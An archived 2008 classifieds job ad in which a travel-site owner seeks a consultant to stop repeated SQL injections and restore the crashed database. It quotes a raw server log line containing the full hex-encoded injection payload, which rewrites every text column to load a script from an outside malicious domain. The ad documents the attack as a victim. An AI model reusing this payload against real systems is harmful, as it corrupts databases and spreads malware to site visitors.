Originally Posted: 2008-07-04 14:07 (no longer live)
print

Web Security Consultant / Database Expert Needed over Weekend

We have a growing travel website that has been down for the past two weeks. We have been experiencing repeated attacks - sql injections that crash our database. Our developer has tried to fix this but has not been able to, due to time allotment, she works on a part-time basis and the fact that we can't restore database independently because of shared hosting environment/knowledge. We have been trying fixes but have not been able to do it yet. And our host has extremely limited availability to restore the db when it is crashes. So I would need someone to review our fixes, and show me or teach me how to fix this manually in the code and then copy the database and restore it myself, and then make sure we are tightened up and secure against other attacks. Let's discuss rates and capabilities. The sooner the better.

Here is one of the hacks

41.232.166.49 - - [30/Jun/2008:17:02:38 +0000] "GET /filename.aspx?letter=A;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST

(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E737570706164772E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1" 200

Some posts about it

http://www.secureworks.com/research/blog/index.php/2008/6/4/new-round-of-mass-sql-injections/

http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1318860,00.html

http://www.microsoft.com/technet/security/advisory/954462.mspx

  • Location: Somerville
  • This is a part-time job.
  • This is a contract job.
  • Principals only. Recruiters, please don't contact this job poster.
  • Please, no phone calls about this job!
  • Please do not contact job poster about other services, products or commercial interests.

post id: 742662737